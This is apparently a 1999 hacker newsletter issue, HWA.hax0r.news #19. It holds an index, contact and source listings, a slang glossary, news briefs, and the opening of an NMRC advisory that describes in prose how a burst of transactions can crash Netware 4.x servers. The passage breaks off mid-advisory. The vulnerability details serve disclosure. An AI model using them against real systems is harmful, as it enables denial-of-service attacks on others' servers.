HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth.
http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 19 Volume 1 1999 May 22nd 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
"If hackers ran the world, there'd be no war--lots of accidents, maybe."
-Anon.
Synopsis
---------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, it's a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #19
=-----------------------------------------------------------------------=
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************
=-------------------------------------------------------------------------=
Issue #19
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. NMRC Advisory, DoS with Netware 4.x's TTS........................
04.0 .. CA's InoculateIT for Windows NT v4.53 only scans inboxes.........
04.1 .. CA's Inoculan software vulnerabilities on NT Workstation SP3 or SP4
05.0 .. [ISN] Everywhere your MAC address shows up.......................
06.0 .. [ALERT] Site Server 3.0 May Expose SQL IDs and PSWs..............
07.0 .. INNdstart 2.0 vulnerability, possible root compromise............
08.0 .. Sunsolve Database leaks crucial information......................
09.0 .. [ISN] Asia is wide open to virus, hacker attacks.................
10.0 .. More on Zyklon's legal troubles..................................
11.0 .. IRC war and a Police HQ bomb threat send two headed for trouble..
12.0 .. UK Labels Windows as 'secure'....................................
13.0 .. Yugoslavia to stay plugged in....................................
14.0 .. VISA Releases Draft Protection Profile ..........................
15.0 .. cgichk v1.35 by su1d sh3ll now scans for 65 vulnerabilities......
15.1 .. cgichk.pl PERL version of the above cgi scanner from Wiltered Fire
16.0 .. Vulnerability in Netscape bookmarks found by George Guninski.....
17.0 .. Lotus Notes in bed with the NSA on encryption keys...............
18.0 .. Packetstorm Security Gets the choke order for .yu sites...........
19.0 .. Common Trojans and the ports they can be found on................
20.0 .. Fts_read vulnerability provides root compromise in FreeBSD find, du
21.0 .. Excel Macro Virus protection patch has a hole....................
22.0 .. Possible root compromise when installing new SSHD................
23.0 .. Apple's AtEase 5.0 security hole.................................
24.0 .. Bug in Microsoft Outlook Express.................................
25.0 .. Trivial buffer overflow DoS on WinAMP 2.x........................
26.0 .. DISA Limits network activity.....................................
27.0 .. Money in the bank is an intangible?..............................
28.0 .. r00tfest is May 21st to 23rd, and promises to be a big success...
29.0 .. heh.pl creates a number of rootshells in /tmp and disguises itself
30.0 .. RedHat6.0 fixes available for some current vulnerabilities........
31.0 .. BisonWare FTP server vulnerabilities can lead to root compromise..
32.0 .. Key Escrow revisited (who are the real criminals here??)..........
33.0 .. AOL Under Siege by Hackers, NOT! .................................
34.0 .. Unknown spammer gets sued.........................................
35.0 .. German police crack down on internet crime........................
36.0 .. After a rather long hiatus BoW resurfaces and releases issue #9...
37.0 .. AntiOnline opens up its knowledge database to the pheds...........
38.0 .. [ISN] RAID99 Hosted by CERIAS Call for papers.....................
39.0 .. Cryptogram May 15th'99............................................
40.0 .. [ISN] Why i'm a security pessimist................................
41.0 .. Bombs Off The Net!................................................
42.0 .. Dark Spyre may end up in jail.....................................
43.0 .. ACTINIC ecommerce package claims to be 'unhackable'...............
44.0 .. MP3's off the net?................................................
45.0 .. Free DNS! finally a network picks up the pieces from ml.org ......
46.0 .. pIRCHCrack cracks password in pirch.ini files.....................
47.0 .. NASA vulnerable to attack.........................................
48.0 .. Vermont's Security Compromised ...................................
49.0 .. NIST May Be Named Info Security Clearing House ...................
50.0 .. 097M.Tristate Macro Virus Contained ..............................
51.0 .. "Hackers" Ruin Online Poll .......................................
52.0 .. DSC v1.01 Released new ezine hits the electronic stands...........
53.0 .. Laser Pointers Illegal? ..........................................
54.0 .. Exploiting NT buffer overruns.....................................
55.0 .. More on biometrics from ZDNET.....................................
=--------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
that's tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: Aug19th-22nd Niagara Falls... .................
HA.HA .. Humour and puzzles ............................................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINKS ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net
@HWA
00.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) ..................http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ ...............http://www.l0pht.com/
NewsTrolls .......................http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/
News/Humour site+ ................http://www.innerpulse.com/
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care whether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the
originator of the message. Please do not "CC" the bugtraq reflector address
if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words
that you post on this list and that reproduction of those words without
your permission in any medium outside the distribution of this list may be
challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09
ISSN 1004-042X
Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
Archivist: Brendan Kehoe
Poof Reader: Etaion Shrdlu, Jr.
Shadow-Archivists: Dan Carosone / Paul Southworth
Ralph Sims / Jyrki Kuoppala
Ian Dickinson
Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
Subscribe: mail majordomo@repsec.com with "subscribe isn".
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
And unofficially yet contributing too much to ignore ;)
Spikeman .........................: World media
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form. Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pigeonholed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. It's almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal usage and use in this zine are
listed below: Some are very useful, others attempt to deny any possible
attempts at eschewing obfuscation by obscuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavy equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, no one can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Kevin Mitnick (watch yer back) Dicentra
vexxation sAs72 Spikeman Astral
p0lix Vexx g0at security
Shouts to tekz from HK for asking nicely in eye-are-see! ;-)
and to t4ck for making my night albeit I couldn't stick around for
the rest of the comedy routine. hacked star dot star with phf huh?
.... ;-))
and the #innerpulse, crew and some inhabitants of #leetchans ....
although I use the term 'leet loosely these days, <k0ff><snicker> ;)
kewl sites:
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.genocide2600.com/~spikeman/
+ http://www.genocide2600.com/~tattooman/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
++ FREE KEVIN Demonstrations Go WorldWide
From HNN http://www.hackernews.com/
contributed by Macki
With demonstrations now scheduled in front of the US Embassy in Russia the FREE KEVIN movement goes
World Wide. Kevin Mitnick has been held in pretrial detention since February 15, 1995, without a
constitutionally guaranteed bail hearing for possession of software allegedly worth millions of
dollars. Protest demonstrations are now being planned around the world for Friday, June 4 in front
of federal courthouses and U.S. embassies beginning at 2 pm to protest the unjust treatment of Kevin
Mitnick. If there is a protest in your city please attend. If there is not please organize one.
The government must be shown that the people will not sit idly by while their rights are trampled!
FREE KEVIN Demonstrations
http://www.2600.com/demo/index.html
++ OpenBSD 2.5
From HNN http://www.hackernews.com/
contributed by Weld Pond
OpenBSD, a Free UNIX variant that places emphasis on portability, standardization, correctness, security, and
cryptography, has just been upgraded to version 2.5. OpenBSD is a multiplatform and ultrasecure operating
system. HNN uses it, shouldn't you? "OpenBSD: Sending the Kiddies to /dev/null since 1992"
openbsd.org
http://www.openbsd.org/
Amazon.com- Reserve Your Copy Today!
http://www.amazon.com/exec/obidos/ASIN/0968363733/hackernewsnet
++ Chinese attacks on U.S. computers
From http://www.net-security.org/
CHINESE HACKERS RAID U.S. COMPUTERS
by LucasAr, Monday 17th May 1999 on 4:30 pm CET
Chinese hackers have attacked U.S. government information systems, including the
White House network, in response to the errant bombing of the Chinese Embassy in
Yugoslavia, according to an FBI report.
++ Just found this on the net, on Discovery Online no less, it
has a (short) Hacker's Hall of Fame list with mini-bios of the
featured hackers. - Ed
http://www.discovery.com/area/technology/hackers/stallman.html
++ MIT Pulls R2-D2 Hack
From HNN http://www.hackernews.com/
contributed by Code Kid
Arguably the place where the word Hacker was coined, MIT students have turned the Great Dome into a giant
R2-D2. For those of you who have been dead for the last seven years, R2-D2 is an android from the Star Wars
movie series. The hack consisted of covering the dome in red, white, blue, and black mesh-fabric panels.
The hackers left a dozen doughnuts and instructions on how to remove the display. The Great Dome has been
a popular place for Hacks in the past. Some of the better known ones have transformed the Dome into a
Breast, a Pumpkin, or have placed a Police Cruiser replica on the top.
MIT Hack Gallery - Pictures Here
http://hacks.mit.edu/Hacks/Gallery.html
Wired
http://www.wired.com/news/news/culture/story/19743.html
++ Scanner profiteer busted
From HNN http://www.hackernews.com/
Scanner Profiteer
contributed by erewhon
Eric Ford, 27, of Studio City, CA, has pleaded guilty to recording and then selling the contents of a
cellular phone call he listened to with a modified police scanner. The conversation was a "marital squabble"
that took place between Tom Cruise and Nicole Kidman. After parts of the conversation appeared in tabloids
the couple contacted the FBI to start an investigation. The perpetrator was sentenced by a federal judge to
six months in jail, 150 hours of community service and fined $3,000.
APB Online
http://www.apbonline.com/911/1999/05/17/cruise0517_01.html
++ Internet Set Free in Canada
From HNN http://www.hackernews.com/
contributed by blsonne
The Canadian Radio-television and Telecommunications Commission (CRTC) agreed on Monday that it will not
regulate new media services on the Internet. After concluding that new media services are vibrant, highly
competitive and successful without regulation, the CRTC has decided not to impose new rules on the internet
so as to not hinder Canada in the global marketplace.
CRTC
http://www.crtc.gc.ca/ENG/NEWS/RELEASES/1999/R990517e.htm
++ Fujitsu Victim of Password Stealing Virus
From HNN http://www.hackernews.com/
contributed by 0yK0t
InfoWeb, Fujitsu Ltd.'s Internet service, has become the victim of an email virus designed to steal users'
passwords. The email claims that users are at risk from a new virus and should run the enclosed attachment
as a precaution. The attachment then steals users' passwords and emails them to a separate address.
G-Search Ltd., a Fujitsu affiliate, says that at least 68 people received the virus/attachment. And once
again this virus only affects Windows users.
AsiaBizTech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/news/70448
Mucho thanks to Spikeman for directing his efforts to our cause of bringing
you the news we want to read about in a timely manner ... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
No mail for sharing this week!
================================================================
@HWA
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*
* Issue #19 'w00t'
*
*
*
*
*
*
*
*/
printf ("EoF.\n");
}
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
@HWA
03.0 Novell Netware buffer overflow in TTS (Transaction Tracking System)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 12 May 1999 14:18:59 -0500
From: Simple Nomad <thegnome@NMRC.ORG>
To: BUGTRAQ@netspace.org
Subject: DoS with Netware 4.x's TTS
_______________________________________________________________________________
Nomad Mobile Research Centre
A D V I S O R Y
www.nmrc.org
Simple Nomad [thegnome@nmrc.org]
12May1998
_______________________________________________________________________________
Platform : Netware 4.x
Application : NDS
Severity : High
Synopsis
--------
It is possible to overflow the Transaction Tracking System (TTS) built into
Novell Netware and possibly crash multiple servers.
Tested configuration
--------------------
The testing was done with the following configuration:
Netware 4.11, Service Pack 5B
Also confirmed on Netware 4.1. All systems had 64MB RAM and 1 GB drive space.
Bug(s) report
-------------
The Transaction Tracking System (TTS) is used by Novell Netware to help
preserve the integrity of data during a system crash. If a transaction is in
the process of being written to the hard drive when the system crashes, upon
reboot the partial transaction is backed out preserving the integrity of the
original data. Administrators can optionally flag a file with the TTS flag
to add this protection (typically done with databases, especially those that
have no rollback features).
TTS by default tracks 10,000 transactions, and each instance uses a small
amount of memory. If a burst of transactions are sent to the server and the
available memory is exhausted, TTS will disable. While TTS is disabled, no
updates can be made to Netware Directory Services. This can impact any program
or process that updates NDS, such as login. In extreme overrun cases, such as
very large simultaneous (or near simultaneous, actually) transactions, memory
will be depleted quick enough to crash the server.
This is not entirely uncommon, as any large burst of traffic updating NDS
will cause the problem, such as bringing up a server after several days of
